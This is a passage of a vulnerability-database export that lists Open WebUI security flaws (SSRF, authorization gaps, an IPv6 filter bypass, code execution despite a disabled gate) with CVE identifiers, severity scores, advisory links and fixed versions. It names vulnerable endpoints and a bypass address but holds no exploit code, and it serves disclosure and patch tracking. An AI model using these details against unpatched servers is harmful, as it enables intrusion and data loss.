vulnerability VCID-8y4k-pj2n-8uhm
15
vulnerability VCID-chug-ma8r-cucc
16
vulnerability VCID-cw4k-3s8z-uqh8
17
vulnerability VCID-dz6g-jgmg-wqce
18
vulnerability VCID-dzh3-rqx4-fqhv
19
vulnerability VCID-ef1t-pxjm-j7cz
20
vulnerability VCID-hj5f-yk3y-ffdg
21
vulnerability VCID-jfs9-dps1-27a2
22
vulnerability VCID-k9jf-5jzd-pkge
23
vulnerability VCID-n4ma-zcpv-5fbp
24
vulnerability VCID-nxvm-97r4-6ybz
25
vulnerability VCID-pkds-1xgn-q3bv
26
vulnerability VCID-q682-k826-efhv
27
vulnerability VCID-qgfh-7u8n-y7c7
28
vulnerability VCID-qjt1-zxx8-r7ht
29
vulnerability VCID-r7vt-4bqm-f7hb
30
vulnerability VCID-reqw-pfm8-c7g5
31
vulnerability VCID-rhhj-rccv-87hw
32
vulnerability VCID-s625-eg1w-gfd1
33
vulnerability VCID-t571-d65a-cyb2
34
vulnerability VCID-um53-kf7u-kkg6
35
vulnerability VCID-vghe-uuzj-m7cu
36
vulnerability VCID-vkx3-71kv-sugt
37
vulnerability VCID-w2vd-r3hr-w3bt
38
vulnerability VCID-wb88-83cj-ffhy
39
vulnerability VCID-wcz4-vwx4-tufb
40
vulnerability VCID-yug9-shts-kufb
41
vulnerability VCID-yysb-dk2k-f7g4
42
vulnerability VCID-ze3m-g96u-27fc
resource_url http://public2.vulnerablecode.io/packages/pkg:pypi/open-webui@0.8.6
aliases CVE-2026-45350, GHSA-4pcg-253r-rf9w
risk_score 4.0
exploitability 0.5
weighted_severity 8.0
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-pwsg-72yy-quhk
47
url VCID-q682-k826-efhv
vulnerability_id VCID-q682-k826-efhv
summary Open WebUI is a self-hosted artificial intelligence platform designed to operate entirely offline. Prior to 0.9.0, a Server-Side Request Forgery (SSRF) vulnerability exists in _process_picture_url() in backend/open_webui/utils/oauth.py (line ~1338). The function fetches arbitrary URLs from OAuth picture claims without applying validate_url(), allowing an attacker to force the server to make HTTP requests to internal resources and exfiltrate the full response. This vulnerability is fixed in 0.9.0.
references
0
reference_url https://api.first.org/data/v1/epss?cve=CVE-2026-45338
reference_id
reference_type
scores
0
value 0.00012
scoring_system epss
scoring_elements 0.01726
published_at 2026-06-13T12:55:00Z
1
value 0.00012
scoring_system epss
scoring_elements 0.01734
published_at 2026-06-14T12:55:00Z
2
value 0.00012
scoring_system epss
scoring_elements 0.0172
published_at 2026-06-11T12:55:00Z
3
value 0.00012
scoring_system epss
scoring_elements 0.01723
published_at 2026-06-12T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2026-45338
1
reference_url https://github.com/open-webui/open-webui
reference_id
reference_type
scores
0
value 7.7
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://github.com/open-webui/open-webui
2
reference_url https://github.com/open-webui/open-webui/releases/tag/v0.9.0
reference_id
reference_type
scores
0
value 7.7
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://github.com/open-webui/open-webui/releases/tag/v0.9.0
3
reference_url https://nvd.nist.gov/vuln/detail/CVE-2026-45338
reference_id
reference_type
scores
0
value 7.7
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2026-45338
4
reference_url https://github.com/advisories/GHSA-24c9-2m8q-qhmh
reference_id GHSA-24c9-2m8q-qhmh
reference_type
scores
0
value HIGH
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-24c9-2m8q-qhmh
5
reference_url https://github.com/open-webui/open-webui/security/advisories/GHSA-24c9-2m8q-qhmh
reference_id GHSA-24c9-2m8q-qhmh
reference_type
scores
0
value 7.7
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N
1
value HIGH
scoring_system cvssv3.1_qr
scoring_elements
2
value HIGH
scoring_system generic_textual
scoring_elements
3
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-05-15T22:20:31Z/
url https://github.com/open-webui/open-webui/security/advisories/GHSA-24c9-2m8q-qhmh
fixed_packages
0
url pkg:pypi/open-webui@0.9.0
purl pkg:pypi/open-webui@0.9.0
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-1g27-4vq6-7kdz
1
vulnerability VCID-1tu1-b9de-nfaa
2
vulnerability VCID-4v8w-kv6g-kkbc
3
vulnerability VCID-4x63-8x64-d3bq
4
vulnerability VCID-5jna-wvd7-j7cm
5
vulnerability VCID-5wfg-zqcy-c7ar
6
vulnerability VCID-8nzh-cpda-dkca
7
vulnerability VCID-8y4k-pj2n-8uhm
8
vulnerability VCID-cw4k-3s8z-uqh8
9
vulnerability VCID-dz6g-jgmg-wqce
10
vulnerability VCID-dzh3-rqx4-fqhv
11
vulnerability VCID-ef1t-pxjm-j7cz
12
vulnerability VCID-hj5f-yk3y-ffdg
13
vulnerability VCID-wcz4-vwx4-tufb
14
vulnerability VCID-yug9-shts-kufb
resource_url http://public2.vulnerablecode.io/packages/pkg:pypi/open-webui@0.9.0
aliases CVE-2026-45338, GHSA-24c9-2m8q-qhmh
risk_score 4.0
exploitability 0.5
weighted_severity 8.0
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-q682-k826-efhv
48
url VCID-qgfh-7u8n-y7c7
vulnerability_id VCID-qgfh-7u8n-y7c7
summary Open WebUI is a self-hosted artificial intelligence platform designed to operate entirely offline. Prior to 0.9.0, any authenticated user can permanently delete files owned by other users via DELETE /api/v1/files/{id} when the target file is referenced in any shared chat. The has_access_to_file() authorization gate unconditionally grants access through its shared-chat branch. It checks neither the requesting user's identity nor the type of operation being performed. File UUIDs (which would otherwise be impractical to guess) are disclosed to any user with read access to a knowledge base via GET /api/v1/knowledge/{id}/files. This vulnerability is fixed in 0.9.0.
references
0
reference_url https://api.first.org/data/v1/epss?cve=CVE-2026-45671
reference_id
reference_type
scores
0
value 0.00045
scoring_system epss
scoring_elements 0.14556
published_at 2026-06-12T12:55:00Z
1
value 0.00045
scoring_system epss
scoring_elements 0.14528
published_at 2026-06-14T12:55:00Z
2
value 0.00045
scoring_system epss
scoring_elements 0.14436
published_at 2026-06-11T12:55:00Z
3
value 0.00045
scoring_system epss
scoring_elements 0.14553
published_at 2026-06-13T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2026-45671
1
reference_url https://github.com/open-webui/open-webui
reference_id
reference_type
scores
0
value 8.0
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://github.com/open-webui/open-webui
2
reference_url https://github.com/open-webui/open-webui/commit/2e52ad8ff2f8d9ed9f38f76e9bc19c8f92d91fc3
reference_id
reference_type
scores
0
value 8.0
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://github.com/open-webui/open-webui/commit/2e52ad8ff2f8d9ed9f38f76e9bc19c8f92d91fc3
3
reference_url https://github.com/open-webui/open-webui/releases/tag/v0.9.0
reference_id
reference_type
scores
0
value 8.0
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://github.com/open-webui/open-webui/releases/tag/v0.9.0
4
reference_url https://nvd.nist.gov/vuln/detail/CVE-2026-45671
reference_id
reference_type
scores
0
value 8.0
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2026-45671
5
reference_url https://github.com/advisories/GHSA-26g9-27vm-x3q8
reference_id GHSA-26g9-27vm-x3q8
reference_type
scores
0
value HIGH
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-26g9-27vm-x3q8
6
reference_url https://github.com/open-webui/open-webui/security/advisories/GHSA-26g9-27vm-x3q8
reference_id GHSA-26g9-27vm-x3q8
reference_type
scores
0
value 8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H
1
value 8.0
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H
2
value HIGH
scoring_system cvssv3.1_qr
scoring_elements
3
value HIGH
scoring_system generic_textual
scoring_elements
4
value Track*
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2026-05-15T21:11:03Z/
url https://github.com/open-webui/open-webui/security/advisories/GHSA-26g9-27vm-x3q8
fixed_packages
0
url pkg:pypi/open-webui@0.9.0
purl pkg:pypi/open-webui@0.9.0
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-1g27-4vq6-7kdz
1
vulnerability VCID-1tu1-b9de-nfaa
2
vulnerability VCID-4v8w-kv6g-kkbc
3
vulnerability VCID-4x63-8x64-d3bq
4
vulnerability VCID-5jna-wvd7-j7cm
5
vulnerability VCID-5wfg-zqcy-c7ar
6
vulnerability VCID-8nzh-cpda-dkca
7
vulnerability VCID-8y4k-pj2n-8uhm
8
vulnerability VCID-cw4k-3s8z-uqh8
9
vulnerability VCID-dz6g-jgmg-wqce
10
vulnerability VCID-dzh3-rqx4-fqhv
11
vulnerability VCID-ef1t-pxjm-j7cz
12
vulnerability VCID-hj5f-yk3y-ffdg
13
vulnerability VCID-wcz4-vwx4-tufb
14
vulnerability VCID-yug9-shts-kufb
resource_url http://public2.vulnerablecode.io/packages/pkg:pypi/open-webui@0.9.0
aliases CVE-2026-45671, GHSA-26g9-27vm-x3q8
risk_score 4.0
exploitability 0.5
weighted_severity 8.0
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-qgfh-7u8n-y7c7
49
url VCID-qjt1-zxx8-r7ht
vulnerability_id VCID-qjt1-zxx8-r7ht
summary Open WebUI is a self-hosted artificial intelligence platform designed to operate entirely offline. Prior to 0.9.0, the POST /api/v1/retrieval/process/web endpoint accepts a user-supplied collection_name and an overwrite query parameter (default: True). It performs no authorization check on whether the calling user owns or has write access to the target collection. When overwrite=True, save_docs_to_vector_db calls VECTOR_DB_CLIENT.delete_collection() on the target collection before writing new content. This vulnerability is fixed in 0.9.0.
references
0
reference_url https://api.first.org/data/v1/epss?cve=CVE-2026-44554
reference_id
reference_type
scores
0
value 0.00043
scoring_system epss
scoring_elements 0.13702
published_at 2026-06-12T12:55:00Z
1
value 0.00043
scoring_system epss
scoring_elements 0.13679
published_at 2026-06-14T12:55:00Z
2
value 0.00043
scoring_system epss
scoring_elements 0.13586
published_at 2026-06-11T12:55:00Z
3
value 0.00043
scoring_system epss
scoring_elements 0.13704
published_at 2026-06-13T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2026-44554
1
reference_url https://github.com/open-webui/open-webui
reference_id
reference_type
scores
0
value 8.1
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://github.com/open-webui/open-webui
2
reference_url https://nvd.nist.gov/vuln/detail/CVE-2026-44554
reference_id
reference_type
scores
0
value 8.1
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2026-44554
3
reference_url https://github.com/advisories/GHSA-7r82-qhg4-6wvj
reference_id GHSA-7r82-qhg4-6wvj
reference_type
scores
0
value HIGH
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-7r82-qhg4-6wvj
4
reference_url https://github.com/open-webui/open-webui/security/advisories/GHSA-7r82-qhg4-6wvj
reference_id GHSA-7r82-qhg4-6wvj
reference_type
scores
0
value 8.1
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H
1
value HIGH
scoring_system cvssv3.1_qr
scoring_elements
2
value HIGH
scoring_system generic_textual
scoring_elements
3
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-05-15T21:09:13Z/
url https://github.com/open-webui/open-webui/security/advisories/GHSA-7r82-qhg4-6wvj
fixed_packages
0
url pkg:pypi/open-webui@0.9.0
purl pkg:pypi/open-webui@0.9.0
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-1g27-4vq6-7kdz
1
vulnerability VCID-1tu1-b9de-nfaa
2
vulnerability VCID-4v8w-kv6g-kkbc
3
vulnerability VCID-4x63-8x64-d3bq
4
vulnerability VCID-5jna-wvd7-j7cm
5
vulnerability VCID-5wfg-zqcy-c7ar
6
vulnerability VCID-8nzh-cpda-dkca
7
vulnerability VCID-8y4k-pj2n-8uhm
8
vulnerability VCID-cw4k-3s8z-uqh8
9
vulnerability VCID-dz6g-jgmg-wqce
10
vulnerability VCID-dzh3-rqx4-fqhv
11
vulnerability VCID-ef1t-pxjm-j7cz
12
vulnerability VCID-hj5f-yk3y-ffdg
13
vulnerability VCID-wcz4-vwx4-tufb
14
vulnerability VCID-yug9-shts-kufb
resource_url http://public2.vulnerablecode.io/packages/pkg:pypi/open-webui@0.9.0
aliases CVE-2026-44554, GHSA-7r82-qhg4-6wvj
risk_score 4.0
exploitability 0.5
weighted_severity 8.0
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-qjt1-zxx8-r7ht
50
url VCID-r7vt-4bqm-f7hb
vulnerability_id VCID-r7vt-4bqm-f7hb
summary Open WebUI is a self-hosted artificial intelligence platform designed to operate entirely offline. Prior to 0.9.0, the GET /api/v1/channels/{id}/members endpoint only checks membership for group and dm channel types (lines 467-469). For standard channels — including private ones — there is no channel_has_access check before returning the member list. Any authenticated user who knows a private channel's UUID can enumerate all users with access to that channel. This vulnerability is fixed in 0.9.0.
references
0
reference_url https://api.first.org/data/v1/epss?cve=CVE-2026-44559
reference_id
reference_type
scores
0
value 0.0003
scoring_system epss
scoring_elements 0.09067
published_at 2026-06-12T12:55:00Z
1
value 0.0003
scoring_system epss
scoring_elements 0.09057
published_at 2026-06-14T12:55:00Z
2
value 0.0003
scoring_system epss
scoring_elements 0.09019
published_at 2026-06-11T12:55:00Z
3
value 0.0003
scoring_system epss
scoring_elements 0.09069
published_at 2026-06-13T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2026-44559
1
reference_url https://github.com/open-webui/open-webui
reference_id
reference_type
scores
0
value 4.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/open-webui/open-webui
2
reference_url https://nvd.nist.gov/vuln/detail/CVE-2026-44559
reference_id
reference_type
scores
0
value 4.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2026-44559
3
reference_url https://github.com/advisories/GHSA-c7wp-3qh5-55pv
reference_id GHSA-c7wp-3qh5-55pv
reference_type
scores
0
value MODERATE
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-c7wp-3qh5-55pv
4
reference_url https://github.com/open-webui/open-webui/security/advisories/GHSA-c7wp-3qh5-55pv
reference_id GHSA-c7wp-3qh5-55pv
reference_type
scores
0
value 4.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N
1
value MODERATE
scoring_system cvssv3.1_qr
scoring_elements
2
value MODERATE
scoring_system generic_textual
scoring_elements
3
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-05-15T20:28:01Z/
url https://github.com/open-webui/open-webui/security/advisories/GHSA-c7wp-3qh5-55pv
fixed_packages
0
url pkg:pypi/open-webui@0.9.0
purl pkg:pypi/open-webui@0.9.0
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-1g27-4vq6-7kdz
1
vulnerability VCID-1tu1-b9de-nfaa
2
vulnerability VCID-4v8w-kv6g-kkbc
3
vulnerability VCID-4x63-8x64-d3bq
4
vulnerability VCID-5jna-wvd7-j7cm
5
vulnerability VCID-5wfg-zqcy-c7ar
6
vulnerability VCID-8nzh-cpda-dkca
7
vulnerability VCID-8y4k-pj2n-8uhm
8
vulnerability VCID-cw4k-3s8z-uqh8
9
vulnerability VCID-dz6g-jgmg-wqce
10
vulnerability VCID-dzh3-rqx4-fqhv
11
vulnerability VCID-ef1t-pxjm-j7cz
12
vulnerability VCID-hj5f-yk3y-ffdg
13
vulnerability VCID-wcz4-vwx4-tufb
14
vulnerability VCID-yug9-shts-kufb
resource_url http://public2.vulnerablecode.io/packages/pkg:pypi/open-webui@0.9.0
aliases CVE-2026-44559, GHSA-c7wp-3qh5-55pv
risk_score 3.1
exploitability 0.5
weighted_severity 6.2
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-r7vt-4bqm-f7hb
51
url VCID-reqw-pfm8-c7g5
vulnerability_id VCID-reqw-pfm8-c7g5
summary Open WebUI is a self-hosted artificial intelligence platform designed to operate entirely offline. Prior to 0.8.12, the /api/v1/utils/code/execute endpoint executes arbitrary Python code via Jupyter for any verified user, even when the admin has set ENABLE_CODE_EXECUTION=false. The feature gate is not enforced on the API endpoint — the configuration says "disabled" but code still executes. This vulnerability is fixed in 0.8.12.
references
0
reference_url https://api.first.org/data/v1/epss?cve=CVE-2026-45672
reference_id
reference_type
scores
0
value 0.00079
scoring_system epss
scoring_elements 0.23672
published_at 2026-06-12T12:55:00Z
1
value 0.00079
scoring_system epss
scoring_elements 0.23663
published_at 2026-06-14T12:55:00Z
2
value 0.00079
scoring_system epss
scoring_elements 0.23475
published_at 2026-06-11T12:55:00Z
3
value 0.00079
scoring_system epss
scoring_elements 0.23682
published_at 2026-06-13T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2026-45672
1
reference_url https://github.com/open-webui/open-webui
reference_id
reference_type
scores
0
value 8.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://github.com/open-webui/open-webui
2
reference_url https://github.com/open-webui/open-webui/commit/6d736d3c598dbe49488675ed42845e00b62dfcba
reference_id
reference_type
scores
0
value 8.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://github.com/open-webui/open-webui/commit/6d736d3c598dbe49488675ed42845e00b62dfcba
3
reference_url https://github.com/open-webui/open-webui/releases/tag/v0.8.12
reference_id
reference_type
scores
0
value 8.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://github.com/open-webui/open-webui/releases/tag/v0.8.12
4
reference_url https://nvd.nist.gov/vuln/detail/CVE-2026-45672
reference_id
reference_type
scores
0
value 8.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2026-45672
5
reference_url https://github.com/advisories/GHSA-482j-2pq6-q5w4
reference_id GHSA-482j-2pq6-q5w4
reference_type
scores
0
value HIGH
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-482j-2pq6-q5w4
6
reference_url https://github.com/open-webui/open-webui/security/advisories/GHSA-482j-2pq6-q5w4
reference_id GHSA-482j-2pq6-q5w4
reference_type
scores
0
value 8.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
1
value HIGH
scoring_system cvssv3.1_qr
scoring_elements
2
value HIGH
scoring_system generic_textual
scoring_elements
3
value Track*
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2026-05-18T19:37:06Z/
url https://github.com/open-webui/open-webui/security/advisories/GHSA-482j-2pq6-q5w4
fixed_packages
0
url pkg:pypi/open-webui@0.8.12
purl pkg:pypi/open-webui@0.8.12
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-14xt-qwyg-w3cj
1
vulnerability VCID-1g27-4vq6-7kdz
2
vulnerability VCID-1tu1-b9de-nfaa
3
vulnerability VCID-2xdz-v8cw-fygv
4
vulnerability VCID-32yb-vsfs-43a8
5
vulnerability VCID-3436-znsq-guds
6
vulnerability VCID-4v8w-kv6g-kkbc
7
vulnerability VCID-4x63-8x64-d3bq
8
vulnerability VCID-5319-t7jm-y3bx
9
vulnerability VCID-5jna-wvd7-j7cm
10
vulnerability VCID-5wfg-zqcy-c7ar
11
vulnerability VCID-5wzn-mfwg-ybc3
12
vulnerability VCID-8nzh-cpda-dkca
13
vulnerability VCID-8y4k-pj2n-8uhm
14
vulnerability VCID-chug-ma8r-cucc
15
vulnerability VCID-cw4k-3s8z-uqh8
16
vulnerability VCID-dz6g-jgmg-wqce
17
vulnerability VCID-dzh3-rqx4-fqhv
18
vulnerability VCID-ef1t-pxjm-j7cz
19
vulnerability VCID-hj5f-yk3y-ffdg
20
vulnerability VCID-jfs9-dps1-27a2
21
vulnerability VCID-n4ma-zcpv-5fbp
22
vulnerability VCID-nxvm-97r4-6ybz
23
vulnerability VCID-pkds-1xgn-q3bv
24
vulnerability VCID-q682-k826-efhv
25
vulnerability VCID-qgfh-7u8n-y7c7
26
vulnerability VCID-qjt1-zxx8-r7ht
27
vulnerability VCID-r7vt-4bqm-f7hb
28
vulnerability VCID-rhhj-rccv-87hw
29
vulnerability VCID-s625-eg1w-gfd1
30
vulnerability VCID-t571-d65a-cyb2
31
vulnerability VCID-vghe-uuzj-m7cu
32
vulnerability VCID-vkx3-71kv-sugt
33
vulnerability VCID-w2vd-r3hr-w3bt
34
vulnerability VCID-wcz4-vwx4-tufb
35
vulnerability VCID-yug9-shts-kufb
36
vulnerability VCID-yysb-dk2k-f7g4
37
vulnerability VCID-ze3m-g96u-27fc
resource_url http://public2.vulnerablecode.io/packages/pkg:pypi/open-webui@0.8.12
aliases CVE-2026-45672, GHSA-482j-2pq6-q5w4
risk_score 4.0
exploitability 0.5
weighted_severity 8.0
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-reqw-pfm8-c7g5
52
url VCID-rhhj-rccv-87hw
vulnerability_id VCID-rhhj-rccv-87hw
summary Open WebUI is a self-hosted artificial intelligence platform designed to operate entirely offline. Prior to 0.9.0, validate_url() in backend/open_webui/retrieval/web/utils.py calls validators.ipv6(ip, private=True), but the validators library does NOT implement the private keyword for IPv6 — the call raises a ValidationError (which is falsy in a boolean context), so every IPv6 address passes the filter. In addition, IPv4-mapped IPv6 (::ffff:10.0.0.1) bypasses the IPv4 check entirely, and several reserved IPv4 ranges (0.0.0.0/8, 100.64.0.0/10, 192.0.0.0/24, etc.) are not blocked. This vulnerability is fixed in 0.9.0.
references
0
reference_url https://api.first.org/data/v1/epss?cve=CVE-2026-45331
reference_id
reference_type
scores
0
value 0.00013
scoring_system epss
scoring_elements 0.02148
published_at 2026-06-14T12:55:00Z
1
value 0.00013
scoring_system epss
scoring_elements 0.02139
published_at 2026-06-11T12:55:00Z
2
value 0.00013
scoring_system epss
scoring_elements 0.02138
published_at 2026-06-13T12:55:00Z
3
value 0.00013
scoring_system epss
scoring_elements 0.02142
published_at 2026-06-12T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2026-45331
1
reference_url https://github.com/open-webui/open-webui
reference_id
reference_type
scores
0
value 8.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:L/A:N
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://github.com/open-webui/open-webui
2
reference_url https://github.com/open-webui/open-webui/releases/tag/v0.9.0
reference_id
reference_type
scores
0
value 8.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:L/A:N
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://github.com/open-webui/open-webui/releases/tag/v0.9.0
3
reference_url https://nvd.nist.gov/vuln/detail/CVE-2026-45331
reference_id
reference_type
scores
0
value 8.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:L/A:N
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2026-45331
4
reference_url https://github.com/advisories/GHSA-4v7r-f4w8-8972
reference_id GHSA-4v7r-f4w8-8972
reference_type
scores
0
value HIGH
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-4v7r-f4w8-8972
5
reference_url https://github.com/open-webui/open-webui/security/advisories/GHSA-4v7r-f4w8-8972
reference_id GHSA-4v7r-f4w8-8972
reference_type
scores
0
value 8.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:L/A:N
1
value HIGH
scoring_system cvssv3.1_qr
scoring_elements
2
value HIGH
scoring_system generic_textual
scoring_elements
3
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-05-15T22:14:00Z/
url https://github.com/open-webui/open-webui/security/advisories/GHSA-4v7r-f4w8-8972
6
reference_url https://github.com/advisories/GHSA-c6xv-rcvw-v685
reference_id GHSA-c6xv-rcvw-v685
reference_type
scores
0
value 8.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:L/A:N
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://github.com/advisories/GHSA-c6xv-rcvw-v685
fixed_packages
0
url pkg:pypi/open-webui@0.9.0
purl pkg:pypi/open-webui@0.9.0
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-1g27-4vq6-7kdz
1
vulnerability VCID-1tu1-b9de-nfaa
2
vulnerability VCID-4v8w-kv6g-kkbc
3
vulnerability VCID-4x63-8x64-d3bq
4
vulnerability VCID-5jna-wvd7-j7cm
5
vulnerability VCID-5wfg-zqcy-c7ar
6
vulnerability VCID-8nzh-cpda-dkca
7
vulnerability VCID-8y4k-pj2n-8uhm
8
vulnerability VCID-cw4k-3s8z-uqh8
9
vulnerability VCID-dz6g-jgmg-wqce
10
vulnerability VCID-dzh3-rqx4-fqhv
11
vulnerability VCID-ef1t-pxjm-j7cz
12
vulnerability VCID-hj5f-yk3y-ffdg
13
vulnerability VCID-wcz4-vwx4-tufb
14
vulnerability VCID-yug9-shts-kufb
resource_url http://public2.vulnerablecode.io/packages/pkg:pypi/open-webui@0.9.0
aliases CVE-2026-45331, GHSA-4v7r-f4w8-8972
risk_score 4.0
exploitability 0.5
weighted_severity 8.0
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-rhhj-rccv-87hw
53
url VCID-s625-eg1w-gfd1
vulnerability_id VCID-s625-eg1w-gfd1
summary Open WebUI is a self-hosted artificial intelligence platform designed to operate entirely offline. Prior to 0.9.0, the /api/generate, /api/embed, /api/embeddings, and /api/show endpoints accept any model name from the user and forward the request to the Ollama backend without checking whether the user is authorized to access that model. These endpoints only require get_verified_user (any authenticated non-pending user) and validate that the model exists in the full unfiltered model list, but never check AccessGrants.has_access(). This vulnerability is fixed in 0.9.0.
references
0
reference_url https://api.first.org/data/v1/epss?cve=CVE-2026-44563
reference_id
reference_type
scores
0
value 0.0004
scoring_system epss
scoring_elements 0.12486
published_at 2026-06-14T12:55:00Z
1
value 0.0004
scoring_system epss
scoring_elements 0.12406
published_at 2026-06-11T12:55:00Z
2
value 0.0004
scoring_system epss
scoring_elements 0.12506
published_at 2026-06-13T12:55:00Z
3
value 0.0004
scoring_system epss
scoring_elements 0.12498
published_at 2026-06-12T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2026-44563
1
reference_url https://github.com/open-webui/open-webui
reference_id
reference_type
scores
0
value 5.4
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:L
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/open-webui/open-webui
2
reference_url https://nvd.nist.gov/vuln/detail/CVE-2026-44563
reference_id
reference_type
scores
0
value 5.4
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:L
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2026-44563
3
